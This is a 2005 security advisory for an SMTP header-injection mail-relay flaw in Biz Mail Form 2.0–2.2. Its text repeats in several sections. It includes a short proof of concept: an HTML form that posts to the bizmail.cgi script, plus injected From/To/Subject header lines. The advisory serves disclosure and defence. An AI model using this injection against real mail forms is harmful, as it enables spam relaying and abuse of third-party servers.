Biz Mail Form Unauthorized Mail Relay Vulnerability
BID:12620
Info
Biz Mail Form Unauthorized Mail Relay Vulnerability
| Bugtraq ID: | 12620 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 22 2005 12:00AM |
| Updated: | Feb 22 2005 12:00AM |
| Credit: | Jason Frisvold is credited with the discovery of this issue. |
| Vulnerable: |
Biz Mail Form Biz Mail Form 2.2 Biz Mail Form Biz Mail Form 2.1 Biz Mail Form Biz Mail Form 2.0 |
| Not Vulnerable: | |
Discussion
Biz Mail Form Unauthorized Mail Relay Vulnerability
Biz Mail Form is prone to a vulnerability that allows the application to be abused as a mail relay.
An attacker can exploit this issue to inject arbitrary SMTP headers by using CR and LF sequences.
If successful, it becomes possible to abuse the application as a mail relay. Email may be sent to arbitrary computers. This could be exploited by spammers or other malicious parties.
Update: It is reported that the update to address this issue (Biz Mail Form 2.2) is vulnerable to this issue as well. The affected version is being added as a vulnerable package and the fixes are being removed.
Biz Mail Form is prone to a vulnerability that allows the application to be abused as a mail relay.
An attacker can exploit this issue to inject arbitrary SMTP headers by using CR and LF sequences.
If successful, it becomes possible to abuse the application as a mail relay. Email may be sent to arbitrary computers. This could be exploited by spammers or other malicious parties.
Update: It is reported that the update to address this issue (Biz Mail Form 2.2) is vulnerable to this issue as well. The affected version is being added as a vulnerable package and the fixes are being removed.
Exploit / POC
Biz Mail Form Unauthorized Mail Relay Vulnerability
An exploit is not required.
The following proof of concept is available:
Place the following into an HTML file:
<HTML>
<HEAD> <TITLE>Exploit Test Page</TITLE> </HEAD>
<BODY>
<form action="http://www.example.com/cgi-bin/bizmail/bizmail.cgi"
method="POST" name="Subscribe">
<TEXTAREA rows="5" name="email"></TEXTAREA>
<INPUT TYPE="submit" VALUE="Submit" class="submit">
</FORM> </BODY> </HTML>
In the textbox that pops up, enter in the following (begin by hitting
enter to insert a blank line)
From:[email protected]
To:[email protected]
Subject:Exploit Test
This is a test
Click submit. You'll receive an email from the bizmail script, but
you won't receive the normal contact email. You can check the .dat
file and see a copy of what you sent.
An exploit is not required.
The following proof of concept is available:
Place the following into an HTML file:
<HTML>
<HEAD> <TITLE>Exploit Test Page</TITLE> </HEAD>
<BODY>
<form action="http://www.example.com/cgi-bin/bizmail/bizmail.cgi"
method="POST" name="Subscribe">
<TEXTAREA rows="5" name="email"></TEXTAREA>
<INPUT TYPE="submit" VALUE="Submit" class="submit">
</FORM> </BODY> </HTML>
In the textbox that pops up, enter in the following (begin by hitting
enter to insert a blank line)
From:[email protected]
To:[email protected]
Subject:Exploit Test
This is a test
Click submit. You'll receive an email from the bizmail script, but
you won't receive the normal contact email. You can check the .dat
file and see a copy of what you sent.
Solution / Fix
Biz Mail Form Unauthorized Mail Relay Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Biz Mail Form Unauthorized Mail Relay Vulnerability
References:
References:
- Biz Mail Form Home Page (Biz Mail Form)
- Re: BizMail 2.1 Spam Exploit (Jason Frisvold